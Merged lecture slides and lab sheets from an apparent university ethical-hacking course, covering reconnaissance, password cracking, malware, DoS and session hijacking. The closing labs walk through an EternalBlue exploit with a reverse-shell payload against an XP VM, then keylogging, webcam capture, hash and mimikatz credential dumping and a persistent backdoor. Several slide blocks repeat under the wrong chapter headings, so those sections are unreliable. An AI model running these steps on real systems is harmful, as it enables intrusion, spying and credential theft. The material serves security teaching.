hacking_merged_merged.pdf

Full Transcript

CYS3104

Chapter 1
Ethical Hacking Overview
By Kushantha Gunawardana
 OBJECTIVES
 Describe the role of an ethical hacker
 Describe what you can do legally as an ethical hacker
 Describe what you cannot do as an ethical hacker
 Classification of Hackers
 Hacking Terminology

Ethical Hacking By Kushantha Gunawardana 2
INTRODUCTION TO ETHICAL HACKING
 Ethical hackers
 Employed by companies to perform penetration tests

 Penetration test
 Legal attempt to break into a company’s network to find its weakest
link
 Tester only reports findings, does not solve problems

 Security test
 More than an attempt to break in; also includes analyzing company’s
security policy and procedures
 Tester offers solutions to secure or protect the network

Ethical Hacking By Kushantha Gunawardana 3
THE ROLE OF SECURITY AND PENETRATION
TESTERS
 Hackers

 Access computer system or network without authorization

 Breaks the law; can go to prison

 Crackers

 Break into systems to steal or destroy data

 U.S. Department of Justice calls both hackers

 Ethical hacker

 Performs most of the same activities but with owner’s permission

Ethical Hacking By Kushantha Gunawardana 4
THE ROLE OF SECURITY AND PENETRATION
TESTERS
 Script kiddies or packet monkeys

 Young inexperienced hackers

 Copy codes and techniques from knowledgeable hackers

 Experienced penetration testers write programs or scripts using
these languages
 Practical Extraction and Report Language (Perl), C, C++, Python,
JavaScript, Visual Basic, SQL, and many others

 Script

 Set of instructions that runs in sequence

Ethical Hacking By Kushantha Gunawardana 5
IT TAKES TIME TO BECOME A HACKER
 This class alone won’t make you a hacker, or an expert
 It might make you a script kiddie

 It usually takes years of study and experience to earn respect
in the hacker community
 It’s a hobby, a lifestyle, and an attitude
 A drive to figure out how things work

Ethical Hacking By Kushantha Gunawardana 6
THE ROLE OF SECURITY AND PENETRATION
TESTERS
 Tiger box
 Collection of OSs and hacking tools

 Usually on a laptop

 Helps penetration testers and security testers conduct vulnerabilities
assessments and attacks
 Examples for Tiger boxes;
 Kali Linux

 Parrot Security

 Security Onion

 Predator

Ethical Hacking By Kushantha Gunawardana 7
 PENETRATION-TESTING METHODOLOGIES
 White box model

 Tester is told everything about the network topology and technology

 Network diagram

 Tester is authorized to interview IT personnel and company employees

 Makes tester’s job a little easier

Ethical Hacking By Kushantha Gunawardana 8
 9
Ethical Hacking By Kushantha Gunawardana
 10

Ethical Hacking By Kushantha Gunawardana
PENETRATION-TESTING METHODOLOGIES
 Black box model

 Company staff does not know about the test

 Tester is not given details about the network

▪ Burden is on the tester to find these details

 Tests if security personnel are able to detect an attack

Ethical Hacking By Kushantha Gunawardana 11
 PENETRATION-TESTING METHODOLOGIES
 Gray box model
 Hybrid of the white and black box models

 Company gives tester partial information

Ethical Hacking By Kushantha Gunawardana 12
CERTIFICATION PROGRAMS FOR NETWORK
SECURITY PERSONNEL
 Certification programs available in almost every area of network
security
 Basics:
 CompTIA Security+ (CNIT 120)

 Network+ (CNIT 106 or 201)

 Cisco Network Security

Ethical Hacking By Kushantha Gunawardana 13
Ethical Hacking By Kushantha Gunawardana
Ethical
Ethical Hacking
Hacking By
By Kushantha
Kushantha Gunawardana
Gunawardana
 Issued by the International Information Systems
Security Certifications Consortium (ISC2)
 Usually more concerned with policies and
procedures than technical details
 Web site
 www.isc2.org

Ethical Hacking By Kushantha Gunawardana
 SANS INSTITUTE
 SysAdmin, Audit, Network, Security (SANS)

 Offers certifications through Global Information Assurance
Certification (GIAC)
 Top 20 list

 One of the most popular SANS Institute documents

 Details the most common network exploits

 Suggests ways of correcting vulnerabilities

 Web site

 www.sans.org (links Ch 1i & Ch 1j)

Ethical Hacking By Kushantha Gunawardana 17
 WHAT YOU CAN DO LEGALLY
 Laws involving technology change as rapidly as technology itself
 Find what is legal for you locally
 Laws change from place to place

 Be aware of what is allowed and what is not allowed

Ethical Hacking By Kushantha Gunawardana 18
 LAWS OF THE LAND
 Tools on your computer might be illegal to possess
 Contact local law enforcement agencies before installing hacking
tools
 Written words are open to interpretation
 Governments are getting more serious about punishment for
cybercrimes

Ethical Hacking By Kushantha Gunawardana 19
IS PORT SCANNING LEGAL?
 Some states deem it legal

 Not always the case

 Federal Government does not see it as a violation

 Allows each state to address it separately

 Read your ISP’s “Acceptable Use Policy”

 IRC “bots” may be forbidden
 Program that sends automatic responses to users

 Gives the appearance of a person being present

Ethical Hacking By Kushantha Gunawardana 20
 Federal computer crime laws are getting more specific

Cover cybercrimes and intellectual property issues

Computer Hacking and Intellectual Property (CHIP)

New government branch to address cybercrimes and intellectual
property issues

Ethical Hacking By Kushantha Gunawardana 21
FEDERAL LAWS

Ethical Hacking By Kushantha Gunawardana 22
 WHAT YOU CANNOT DO LEGALLY
 Accessing a computer without permission is illegal
 Other illegal actions
 Installing worms or viruses

 Denial of Service attacks

 Denying users access to network resources

 Be careful your actions do not prevent customers from doing their
jobs

Ethical Hacking By Kushantha Gunawardana 23
 GET IT IN WRITING
 Using a contract is just good business
 Contracts may be useful in court
 Books on working as an independent contractor
 The Computer Consultant’s Guide by Janet Ruhl

 Getting Started in Computer Consulting by Peter Meyer

 Internet can also be a useful resource
 Have an attorney read over your contract before sending or
signing it

Ethical Hacking By Kushantha Gunawardana 24
ETHICAL HACKING IN A NUTSHELL
 What it takes to be a security tester
 Knowledge of network and computer technology

 Ability to communicate with management and IT personnel

 Understanding of the laws

 Ability to use necessary tools

Ethical Hacking By Kushantha Gunawardana 25
 CYS3104

Chapter 2
Ethical Hacking Overview
By Kushantha Gunawardana
 Hackers and their vocabulary
 Threats and risks
 Types of hackers
 Gaining access
 Intrusion detection and prevention
 Legal and ethical issues
 Hacking - showing computer expertise
 Cracking - breaching security on software or systems
 Phreaking - cracking telecom networks
 Spoofing - faking the originating IP address in a datagram
 Denial of Service (DoS) - flooding a host with sufficient
network traffic so that it can’t respond anymore
 Port Scanning - searching for vulnerabilities
 1969 - Unix ‘hacked’ together
 1971 - Cap ‘n Crunch phone exploit discovered
 1988 - Morris Internet worm crashes 6,000 servers
 1994 - $10 million transferred from CitiBank accounts
 1995 - Kevin Mitnick sentenced to 5 years in jail
 2000 - Major websites succumb to DDoS
 2000 - 15,700 credit and debit card numbers stolen from Western Union (hacked
while web database was undergoing maintenance)
 2001 Code Red
 exploited bug in MS IIS to penetrate & spread
 probes random IPs for systems running IIS
 had trigger time for denial-of-service attack
 2nd wave infected 360000 servers in 14 hours
 Code Red 2 - had backdoor installed to allow remote control
 Nimda -used multiple infection mechanisms email, shares, web client , IIS
 2002 – Slammer Worm brings web to its knees by attacking MS SQL Server
 Denial of Service (Yahoo, eBay, CNN, MS)
 Defacing, Graffiti, Slander, Reputation
 Loss of data (destruction, theft)
 Divulging private information (AirMiles, corporate espionage,
personal financial)
 Loss of financial assets (CitiBank)
 Professional hackers
 Black Hats – the Bad Guys
 White Hats – Professional Security Experts

 Script kiddies
 Mostly kids/students
 User tools created by black hats,
 To get free stuff
 Impress their peers
 Not get caught

 Underemployed Adult Hackers
 Former Script Kiddies
 Can’t get employment in the field
 Want recognition in hacker community
 Big in eastern european countries

 Ideological Hackers
 hack as a mechanism to promote some political or ideological
purpose
 Usually coincide with political events
 Criminal Hackers
 Real criminals, are in it for whatever they can get no matter
who it hurts
 Corporate Spies
 Are relatively rare

 Disgruntled Employees
 Most dangerous to an enterprise as they are “insiders”
 Since many companies subcontract their network services a
disgruntled vendor could be very dangerous to the host
enterprise
 Front door
 Password guessing
 Password/key stealing

 Back doors
 Often left by original developers as debug and/or diagnostic
tools
 Forgot to remove before release

 Trojan Horses
 Usually hidden inside of software that we download and
install from the net (remember nothing is free)
 Many install backdoors

 Software vulnerability exploitation
 Often advertised on the OEMs web site along with security
patches
 Fertile ground for script kiddies looking for something to do
 Whack-a-mole / NetBus
 Cable modems / DSL very vulnerable
 Protect with Virus Scanners, Port Scanners, Personal Firewalls
 AndroRAT
 Nuclear RAT
 Buffer overflaws
 SQL Injection / XSS / Injection Attacks
 HTML / CGI scripts
 Poor design of web applications
 Javascript hacks
 PHP/ASP/ColdFusion URL hacks

 Other holes / bugs in software and services
 Tools and scripts used to scan ports for
vulnerabilities
 Default or null passwords
 Password same as user name (use finger)
 Password files, trusted servers
 Brute force
 make sure login attempts audited!
 Dumpster diving
 Its amazing what people throw in the trash
 Personal information
 Passwords
 Good doughnuts
 Many enterprises now shred all white paper trash

 Inside jobs
 Disgruntled employees
 Terminated employees (about 50% of intrusions
resulting in significant loss)
 Modify logs
 To cover their tracks
 To mess with you

 Steal files
 Sometimes destroy after stealing
 A pro would steal and cover their tracks so to be undetected

 Modify files
 To let you know they were there
 To cause mischief

 Install back doors
 So they can get in again

 Attack other systems
 A lot of research going on at universities
 Doug Somerville- EE Dept, Viktor Skorman – EE Dept

 Big money available due to 9/11 and Dept of
Homeland Security
 Vulnerability scanners
 pro-actively identifies risks
 User use pattern matching
 When pattern deviates from norm should be investigated

 Network-based IDS
 examine packets for suspicious activity
 can integrate with firewall
 require one dedicated IDS server per segment
 Host-based IDS
 monitors logs, events, files, and packets sent to the host
 installed on each host on network

 Honeypot
 decoy server
 collects evidence and alerts admin
 Patches and upgrades (hardening)
 Disabling unnecessary software
 Firewalls and Intrusion Detection Systems
 ‘Honeypots’
 Recognizing and reacting to port scanning
 ‘Ethical’ hacking?
 How to react to mischief or nuisances?
 Is scanning for vulnerabilities legal?
 Some hackers are trying to use this as a business model
 Here are your vulnerabilities, let us help you

 Can private property laws be applied on the
Internet?
 Financial Fraud
 Credit Card Theft
 Identity Theft
 Computer specific crimes
 Denial-of-service
 Denial of access to information
 Viruses Melissa virus cost New Jersey man 20 months in jail
 Melissa caused in excess of $80 Million

 Intellectual Property Offenses
 Information theft
 Trafficking in pirated information
 Storing pirated information
 Compromising information
 Destroying information
 Content related Offenses
 Hate crimes
 Harrassment
 Cyber-stalking

 Child privacy
 Computer Fraud and Abuse Act of 1984
 Makes it a crime to knowingly access a federal computer

 Electronic Communications Privacy Act of 1986
 Updated the Federal Wiretap Act act to include electronically stored
data
 U.S. Communications Assistance for Law Enforcement Act of 1996
 Ammended the Electronic Communications Act to require all
communications carriers to make wiretaps possible
 Economic and Protection of Proprietary Information Act of 1996
 Extends definition of privacy to include proprietary economic
information , theft would constitute corporate or industrial espionage
 Health Insurance Portability and Accountability Act of 1996
 Standards for the electronic transmission of healthcare information

 National Information Infrastructure Protection Act of 1996
 Amends Computer Fraud and Abuse Act to provide more protection to
computerized information and systems used in foreign and interstate
commerce or communications
 The Graham-Lynch-Bliley Act of 1999
 Limits instances of when financial institution can disclose nonpublic
information of a customer to a third party
 Average armed robber will get $2500-$7500 and risk
being shot or killed; 50-60% will get caught ,
convicted and spent an average of 5 years of hard
time
 Average computer criminal will net $50K-$500K with
a risk of being fired or going to jail; only 10% are
caught, of those only 15% will be turned in to
authorities; less than 50% of them will do jail time
 Prosecution
 Many institutions fail to prosecute for fear of advertising
 Many banks absorb the losses fearing that they would lose more
if their customers found out and took their business elsewhere
 Fix the vulnerability and continue on with business as usual
 CYS3104

Chapter 3
Phases of Ethical Hacking
By Kushantha Gunawardana
 Five phases of hacking
 Reconnaissance
 Open-source intelligence
 Scanning
 Port scanning
 Ping sweep
 Vulnerability scanning
 Enumeration
 System hacking
 Network hacking
 Software hacking
 Reconnaissance
 Scanning
 Gaining Access
 Maintaining Access
 Covering Tracks
 Collect maximum information about network, hosts,
ports, services and other target system information.
 This can be done by directly approaching to the
target and gaining knowledge about the target or
using indirect methods such as web site, social sites.
 Techniques :
 Open-source Intelligence
 Whois
 Social engineering
 Shodan
 Ping
 Traceroute
 Is a method of collecting and analyzing of data from
publicly available sources.
 Tools :
 Maltego
 Spyse
 Intelligence X
 Recon-ng
 The Harvester
 Shodan is a search engine for internet connected
devices such as Routers, servers, IoTs, etc.
 A tool designed to grab information such as emails,
subdomains, employee names, banners etc.
 Whois lookup use
to find information
related to a
specific domain
such as owner
name, address,
contact details
etc.
 Scanning phase is for bulk assessment and identification of
listed ports and services.
 Vulnerability scanning is also a part of this process.
 Techniques :
 Port scanning
 Ping sweep
 OS detection
 Method for determining which ports are open on
a target.
 Ports are the place where information sent and
received. It is similar to knocking on doors to
check whether there is some one.
 Nmap
 Netcat
 Legion
 Advanced port scanner
 Ping sweep is a technique use to determine which
IPs alive in a network or particular IP range.
 Tools for ping sweep :
 Angry IP scanner
 Fping
 Advanced ip scanner
 Hping
 Network pinger
 Is a technique to assess possible security vulnerabilities in a
target computer, system, service or network.
 Helps to map exploitations should be launched in next phases.
 Tools :
 Nessus Pro
 Open VAS
 Rapid7
 Burpsuit
 Nessus vulnerability scan result
 Alive hosts
 Open ports
 Running services and their versions
 Detected OS versions
 Detected vulnerabilities
 Severity level of particular vulnerabilities
 Solutions
 Process of identifying resources on a network and
more deeply probing of information from a system.
 Include :
 List user accounts
 List file shares
 Retrieve network information
 Identify applications
 SMB enumeration
 LDAP enumeration
 DNS enumeration
 SNMP enumeration
 SMTP enumeration
 RPC enumeration
 Use to enumerate shared network resources and users through
SMB service.
 SMB protocol use to share files inside the network
 Tools :
 Smbmap
 Nmap smb scripts
 Smbclient
 enum4linux
 Light Directory Access Protocol (LDAP) is a protocol use to
access directory listing services such as Active directory
service.
 Using LDAP enumeration it can retrieve:
 Domain structure
 User names
 Group names
 Domain name
 Forest name
 Domain and forest levels

 Tools :
 Nmap (using ldap-search script)
 Ldap search
 Ad-ldap-enum
 JXplorer
 CYS3104

Chapter 4
Scanning and enumeration
By Kushantha Gunawardana
 Five phases of hacking
 Reconnaissance
 Open-source intelligence
 Scanning
 Port scanning
 Ping sweep
 Vulnerability scanning
 Enumeration
 DNS is a naming system for convert human readable
domain names into computer readable IP addresses. It
provides essential functionality for the internet to work.
 Therefore DNS service is very important for accessing
remote server using a domain name. If those records are
manipulated or hijacked, attacker can access to
unauthorized information.
 Techniques :
 DNS zone transfer
 DNS bruteforce
 Dnsenum
 dnsrecon
 DNS brute-forcing
 Is a method to reveal subdomains of a particular target
domain. Using a pre-built wordlist it check for random
subdomains to resolve. If they resolve into IPs particular
subdomain would actually exist
 Dnsenum
 It’s a multithreaded tool written in perl. Use to
enumerate DNS information of a domain. It is
capable of Get A record, MX record, perform axfr
queries (retrieve data from zone transferring), get
extra names and subdomains from google scraping,
DNS bruteforce, performe reverse lookup on
network ranges.
 Dnsrecon
 Similar tool like dnsenum but python based.
Capable of check all NS records for zone transfer,
retrieve general DNS records, SRV record
enumeration, wild card resolution, enumeration
hosts and subdomains using google, etc.
 Using above techniques and tools attacker can uncover IP
addresses, hidden domains, subdomains, name servers, mail
servers’ details and other important information of particular
company or organization for further exploitation process.
 Identifying live hosts is a basic step in attacking
methodology. If intended target is unknown this
could take long time to find particular live hosts.
 CYS3104

Chapter 5
System Hacking
By Kushantha Gunawardana
 Password cracking techniques are used to recover
passwords from computer systems.
 Attackers use password cracking techniques to gain
unauthorized access to the vulnerable system.
 Most of the password cracking techniques are successful
due to weak or easily guessable passwords.
 Non-Electronic Attacks
 Shoulder Surfing
 Dumpster Diving

 Active Online Attacks
 Dictionary Attack
 Brute Forcing Attack
 Rule-Based Attack

 Passive Online Attacks
 Wire sniffing
 MITM
 Replay Attacks

 Offline Attacks
 Rainbow Table Attack
 Distributed Network Attack
 Security Accounts Manager
 Windows stores user passwords in SAM, or in the Active Directory Database in
domain. Passwords are never stored in clear text ; passwords are hashed and the
results are stored in the SAM

 NTLM Authentication

 Kerberos Authentication
 Microsoft has upgraded its default authentication protocol to Kerberos which
provides a stronger authentication for client/server applications than NTLM.
 L0phtCrack
 Ophcrack
 Cain & Abel
 Rainbow Crack
 Crackmapexec
 AirCrack Suite
 Hydra
 Hashcat
 Medusa
 John The Ripper
 Types of Privilege Escalation

 Vertical Privilege Escalation
 Refers to gaining higher privileges than the existing

 Horizontal Privilege Escalation
 Refers to acquiring the same level of privileges that already has been granted
but assuming the identity user with the similar privileges
 User -> Admin
 Passwd
 Vulnerability
 Weak permission: service,File
 DLL Hijacking

 Admin -> Other/System
 Pass the Hash
 Install Service ( sc )
 (Access ) Token Kidnapping
 Process Hijacking ( RunFromProcess)
 Attackers execute malicious applications in this stage.
This is called “owning” the system.
 Attackers execute malicious programs remotely in the
victim’s machine to gather information that leads to
exploitation or loss of privacy, gain unauthorized access
to system resources , crack the password, capture the
screenshots, install a backdoor to maintain easy access,
 Windows: psexec \\IP –u User –p PW cmd.exe
 Linux : winexe –U USER%PW //IP cmd.exe
 Keystroke loggers are programs or hardware devices that monitor each keystroke as

 user types on a keyboard, logs onto a file, or transmits them to a remote location.

 Legitimate applications for keyloggers include in office and industrial settings to
monitor
 employees' computer activities and in home environments where parents can monitor

 and spy on children's activity.

 It allows attackers to gather confidential information about victims such as email ID,

 passwords, banking details, chat room activity, IRC, instant messages, etc.

 Physical keyloggers are placed between the keyboard hardware and the operating
system.
 Hardware Keyloggers
 Software Keyloggers
 Spyware is a program that records a user's interaction with the
computer and Internet
 without the user's knowledge and sends them to the remote
attackers.

 Spyware hides its process, files, and other objects in order to avoid
detection and
 removal.

 It is similar to Trojan horse, which is usually bundled as a hidden
component of freeware
 programs that can be available on the Internet for download.
 Rootkits are programs that hide their presence as well as attacker's
malicious activities,
 granting them full access to the server or host at that time and also in
future.
 Rootkits replace certain operating system calls and utilities with its
own modified
 versions of those routines that in turn undermine the security of the
target system
 causing malicious functions to be executed.
 A typical rootkit comprises backdoor programs, DDoS programs,
packet sniffers, log-wiping utilities, IRC bots, etc
 Steganography is a technique of hiding a secret message within an
ordinary message
 and extracting it at the destination to maintain confidentiality of data.
 Utilizing a graphic image as a cover is the most popular method to
conceal the data in files.
 Attackers can use steganography to hide messages such as a list of
the compromised
 servers, source code for the hacking tool, plans for future attacks, etc.
 Once intruders have successfully gained administrator access on a
system, they will try to cover the tracks to avoid their detection.
 Attacker uses following techniques to cover tracks on the target
system:
 Disabling auditing
 Clearing Logs
 Manipulating Logs
 CYS3104

Chapter 6
Malware Threats
By Kushantha Gunawardana
 Malware is a malicious software that damages or disables
computer systems and gives limited or full control of the
systems to the malware creator for the purpose of theft or
fraud.
 Examples of Malware
 Trojan
 Backdoor
 Rootkit
 Ransomware
 Adware
 Virus
 Worms
 Spyware
 Botnet
 Crypter
 It is a program in which the malicious or harmful code is
contained inside apparently
 harmless programming or data in such a way that it can get
control and cause damage,
 such as ruining the file allocation table on your hard disk.

 Trojans get activated upon users' certain predefined actions.

 Indications of a Trojan attack include abnormal system and
network activities such as
 disabling of antivirus, redirection to unknown pages, etc.

 Trojans create a covert communication channel between victim
computer and attacker for transferring sensitive data.
 A virus is a self-replicating program that produces its own
copy by attaching itself to another program, computer
boot sector or document.
 Viruses are generally transmitted through file downloads,
infected disk/flash drives and as email attachments.

 Virus Characteristics:
 Infects other program
 Transforms itself
 Encrypts itself
 Alter data
 Corrupts files and programs
 Self-replication
 Design
 Replication
 Launch
 Detection
 Incorporation
 Elimination
 System or Boot Sector Viruses
 File and Multipartite Viruses
 Macro Viruses
 Cluster Viruses
 Stealth/Tunneling Viruses
 Encryption Viruses
 Metamorphic Viruses
 File Overwriting or Cavity Viruses
 Sparse Infector Viruses
 Companion/Camouflage Viruses
 Shell Viruses
 File Extension Viruses
 Add-on and Intrusive Viruses
 Transient and Terminate and Stay Resident Viruses
 Computer worms are malicious programs that replicate,
execute, and spread across the network connections
independently without human interaction.
 Most of the worms are created only to replicate and
spread across a network,consuming available computing
resources; however, some worms carry a payload to
damage the host system.
 Attackers use worm payload to install backdoors in
infected computers, which turns them into zombies and
creates botnets; these botnets can be used to carry out
further cyber attacks.
 Static Malware Analysis
 Dynamic Malware Analysis
 CYS3104

Chapter 7
Sniffing
By Kushantha Gunawardana
 Sniffing is a process of monitoring and capturing all data
packets passing through a
 given network using sniffing tools.

 It is a form of wiretap applied to computer networks.

 Many enterprises' switch ports are open.

 Anyone in the same physical location can plug into the
network using an Ethernet cable.
 It is a program in which the malicious or harmful code is
contained inside apparently
 harmless programming or data in such a way that it can get
control and cause damage,
 such as ruining the file allocation table on your hard disk.

 Trojans get activated upon users' certain predefined actions.

 Indications of a Trojan attack include abnormal system and
network activities such as
 disabling of antivirus, redirection to unknown pages, etc.

 Trojans create a covert communication channel between victim
computer and attacker for transferring sensitive data.
 A virus is a self-replicating program that produces its own
copy by attaching itself to another program, computer
boot sector or document.
 Viruses are generally transmitted through file downloads,
infected disk/flash drives and as email attachments.

 Virus Characteristics:
 Infects other program
 Transforms itself
 Encrypts itself
 Alter data
 Corrupts files and programs
 Self-replication
 Design
 Replication
 Launch
 Detection
 Incorporation
 Elimination
 System or Boot Sector Viruses
 File and Multipartite Viruses
 Macro Viruses
 Cluster Viruses
 Stealth/Tunneling Viruses
 Encryption Viruses
 Metamorphic Viruses
 File Overwriting or Cavity Viruses
 Sparse Infector Viruses
 Companion/Camouflage Viruses
 Shell Viruses
 File Extension Viruses
 Add-on and Intrusive Viruses
 Transient and Terminate and Stay Resident Viruses
 Computer worms are malicious programs that replicate,
execute, and spread across the network connections
independently without human interaction.
 Most of the worms are created only to replicate and
spread across a network,consuming available computing
resources; however, some worms carry a payload to
damage the host system.
 Attackers use worm payload to install backdoors in
infected computers, which turns them into zombies and
creates botnets; these botnets can be used to carry out
further cyber attacks.
 Static Malware Analysis
 Dynamic Malware Analysis
 CYS3104

Chapter 8
Social Engineering
By Kushantha Gunawardana
 Social engineering is the art of convincing people to
reveal confidential information.
 Common targets of social engineering include help desk
personnel, technical support executives, system
administrators, etc.
 Social engineers depend on the fact that people are
unaware of their valuable information and are careless
about protecting it.
 Security policies are as strong as their weakest link, and
humans are most susceptible factor.

 It is difficult to detect social engineering attempts.

 There is no method to ensure complete security from
social engineering attacks.

 There is no specific software or hardware for defending
against a social engineering attack.
 Human Based Social Engineering
 Computer Based Social Engineering
 Mobile Based Social Engineering
 Eavesdropping
 Shoulder Surfing
 Dumpster Diving
 Reverse Social Engineering
 Piggybacking
 Tailgating
 Pop-up Windows
 Hoax Letters
 Chain Letters
 Instant Chat Messenger
 Spam Email
 Phishing
 Spear Phishing
 Publishing Malicious Apps
 Repackaging Legitimate Apps
 Using SMS
 Spying
 If a competitor wants to cause damage to your organization, steal critical secrets,
or put you out of business, they just have to find a job opening, prepare someone
to pass the interview, have that person hired, and they will be in the organization.

 Revenge
 It takes only one disgruntled person to take revenge and your company is
compromised.

 Insider Attack
 An inside attack is easy to launch.
○ Prevention is difficult.
○ The inside attacker can easily succeed.
 Identity theft occurs when someone steals your
personally identifiable information for
fraudulent purposes.
 It is a crime in which an imposter obtains personal
identifying information such as name,
credit card number, social security or driver license
numbers, etc. to commit fraud or
other crimes.
 Attackers can use identity theft to impersonate employees
of a target organization and
physically access the facility.
 CYS3104

Chapter 9
DOS & DDOS
By Kushantha Gunawardana
 Denial of Service (DoS) is an attack on a computer or
network that reduces, restricts or
prevents accessibility of system resources to its
legitimate users.
 In a DoS attack, attackers flood a victim system with non-
legitimate service requests or
traffic to overload its resources.
 DoS attack leads to unavailability of a particular website
and show network performance.
 A distributed denial-of-service (DDoS) attack involves a
multitude of compromised
systems attacking a single target, thereby causing denial
of service for users of the
targeted system.
 To launch a DDoS attack, an attacker uses botnets and
attacks a single system.
 Volumetric Attacks
 Fragmentation Attacks
 TCP State-Exhaustion Attacks
 Application Layer Attacks
 Bandwidth Attacks and Service Request Floods
 SYN Flooding Attack
 ICMP Flood Attack
 Peer-to-Peer Attacks
 Application-Level Flood Attacks
 Permanent Denial-of-Service Attack
 Distributed Reflection Denial of Service (DrDoS)
 Phlashing
 Sabotage
 Bricking a system
 Bots are software applications that run automated tasks
over the Internet and perform
simple repetitive tasks, such as web spidering and search
engine indexing.
 A botnet is a huge network of the compromised systems
and can be used by an attacker
to launch denial-of-service attacks
 HULK
 Tor’s Hammer
 Slowloris
 LOIC
 XOIC
 DDOSIM
 RUDY
 PyLoris
 CYS3104

Chapter 10
Session Hijacking
By Kushantha Gunawardana
 Session hijacking refers to an attack where an attacker
takes over a valid TCP
communication session between two computers.
 Since most authentication only occurs at the start of a TCP
session, this allows the
attacker to gain access to a machine.
 Attackers can sniff all the traffic from the established TCP
sessions and perform identity
theft, information theft, fraud, etc.
 The attacker steals a valid session ID and uses it to
authenticate himself with the server
 Stealing
 Guessing
 Brute Forcing
 Stealing Session IDs
 Command Injection
 Session ID prediction
 Session Desynchronization
 Monitor
 Sniff
 Session sniffing
 Predictable session token
 Man-in-the-middle attack
 Man-in-the-browser attack
 Cross-site script attack
 Cross-site request forgery attack
 Session replay attack
 Session fixation
 Blind Hijacking
 UDP Hijacking
 TCP/IP Hijacking
 RST Hijacking
 Man-in-the-Middle: Packet Sniffer
 IP Spoofing: Source Routed Packets
 Zaproxy
 Burp Suite
 Jhijack
 DroidSheep
 DroidSniff
 A distributed denial-of-service (DDoS) attack involves a
multitude of compromised
systems attacking a single target, thereby causing denial
of service for users of the
targeted system.
 To launch a DDoS attack, an attacker uses botnets and
attacks a single system.
 Volumetric Attacks
 Fragmentation Attacks
 TCP State-Exhaustion Attacks
 Application Layer Attacks
 Bandwidth Attacks and Service Request Floods
 SYN Flooding Attack
 ICMP Flood Attack
 Peer-to-Peer Attacks
 Application-Level Flood Attacks
 Permanent Denial-of-Service Attack
 Distributed Reflection Denial of Service (DrDoS)
 Phlashing
 Sabotage
 Bricking a system
 Bots are software applications that run automated tasks
over the Internet and perform
simple repetitive tasks, such as web spidering and search
engine indexing.
 A botnet is a huge network of the compromised systems
and can be used by an attacker
to launch denial-of-service attacks
 HULK
 Tor’s Hammer
 Slowloris
 LOIC
 XOIC
 DDOSIM
 RUDY
 PyLoris
 CYS3104

Chapter 11
Hacking Web Servers
By Kushantha Gunawardana
 Web servers include both hardware and software that
hosts websites; attackers usually
target software vulnerabilities and configuration errors to
compromise web servers.
 Network and OS level attacks can be well defended using
proper network security
measures such as firewalls, IDS, etc., however, web
servers are accessible from
anywhere on the web, which makes them less secured
and more vulnerable to attacks.
 Improper file and directory permissions

 Installing the server with default settings

 Unnecessary services enabled, including content management and remote
administration.
 Security conflicts with business ease-of-use case

 Lack of proper security policy, procedures, and maintenance.

 Improper authentication with external systems

 Default accounts with their default or no passwords.

 Unnecessary default, backup, or sample files.

 Misconfiguration in web server, operating systems, and networks.

 Bugs in server software, OS, and web applications.

 Misconfigured SSL certificates and encryption settings

 Administrative or debugging functions that are enabled or accessible on web servers.

 Use of self-signed certificates and default certificates
 DoS/DDoS Attacks
 DNS Server Hijacking
 DNS Amplification Attack
 Directory Traversal Attacks
 Man-in-the-Middle/Sniffing Attack
 Phishing Attacks
 Website Defacement
 Web Server Misconfiguration
 HTTP Response Splitting Attack
 Web Cache Poisoning Attack
 SSH Bruteforce Attack
 Session sniffing
 Predictable session token
 Man-in-the-middle attack
 Man-in-the-browser attack
 Cross-site script attack
 Cross-site request forgery attack
 Session replay attack
 Session fixation
 Blind Hijacking
 UDP Hijacking
 TCP/IP Hijacking
 RST Hijacking
 Man-in-the-Middle: Packet Sniffer
 IP Spoofing: Source Routed Packets
 Zaproxy
 Burp Suite
 Jhijack
 DroidSheep
 DroidSniff
LAB
Materials Needed:
XP VM image
Kali Linux VM
Incident report template (provided)

Task 1: Setting Up the Environment
Deploy the XP VM and Kali Linux VM:
Ensure both VMs are on the same virtual network.
Verify connectivity between VMs using the ping command

Task 2: Conducting Vulnerability Scans

Open Metasploit Framework on Kali Linux:

“Msfconsole”

Perform a Basic Port Scan to Identify Open Ports:

Perform a Basic Port Scan using Metasploit's TCP Scanner:

“use auxiliary/scanner/portscan/tcp

set RHOSTS [XP-IP]

run”

Select and Run Vulnerability Scanners:

1. FTP Scanner:

“use auxiliary/scanner/ftp/anonymous

set RHOSTS [XP-IP]

run”

2. HTTP Scanner:

“use auxiliary/scanner/http/http_version
 set RHOSTS [XP-IP]

run”

3. SMB Scanner:

“use auxiliary/scanner/smb/smb_version

set RHOSTS [XP-IP]

run”

4. SSH Scanner:

“use auxiliary/scanner/ssh/ssh_version

set RHOSTS [XP-IP]

run”

Task 3: Documenting the Findings
1. Fill Out the Vulnerability Scan Report Template:

o Target Information: Record the IP address and any relevant details
about the target.

o Scan Details: Note the types of scans performed.

o Open Ports and Services: List the open ports and corresponding
services detected.

o Service Versions: Document the versions of the services running on
the open ports.

o Potential Vulnerabilities: Identify any potential vulnerabilities based
on the services and versions detected.
Lab 3

Pre-requisite

1. Start kali and windows xp sessions
2. Get windows XP ip address
a. Ipconfig
3. Get kali ip address
a. Ifconfig
4. Ensure both VMs are on the same subnet
5. As you have already done the Metasploit tutorial I will skip the essential scanning
parts and move straight to the exploit
6. Run msfconsole
7. Search eternalblue
a. Load the ms17_010 psexec exploit
8. Load the meterpreter/reverse_tcp payload
9. Set RHOSTs and Rports
10. Run exploit
11. Once meterpreter session has started you may start the activities

Activities

Try using the following meterpreter commands and document your results

Gathering System Information

1. Get system information
a. Sysinfo
2. Get User ID
a. getuid

Session Management

3. List Active Sessions
a. sessions -l
4. Interact with a Specific Session
a. sessions -i

File System Interaction

5. Navigate the File System
a. cd
b. ls
6. Download a File
a. download
 7. Upload a File
a. upload
8. Read a file
a. cat
9. Delete a file
a. rm

Screenshots and Webcam

10. Take a screenshot
a. screenshot
b. You can also use screengrab after migrating to specific programs to get
specific application screenshots
i. Ps to find running programs
ii. Migrate
iii. Screengrab
11. List webcams
a. webcam_list
12. Take photo from the webcam
a. webcam_snap

Keylogging and Passwords

13. Start Keylogger
a. keyscan_start
14. Stop Keylogger
a. Keyscan_Stop
15. Dump keystrokes
a. keyscan_dump
16. Dump Windows Password Hashes
a. run post/windows/gather/hashdump
b. This will output the password hashes stored on the Windows machine.
These can be cracked offline using tools like John the Ripper or Hashcat.
You may try.
17. dump passwords from memory
a. run post/windows/gather/credentials/mimikatz

Network Pivoting and Tunneling

18. Port Forwarding
a. portfwd add -l -p -r

Maintaining Access

19. Creating a Persistent Backdoor
 a. run persistence -U -i 5 -p 4444 -r

Escalating Privileges

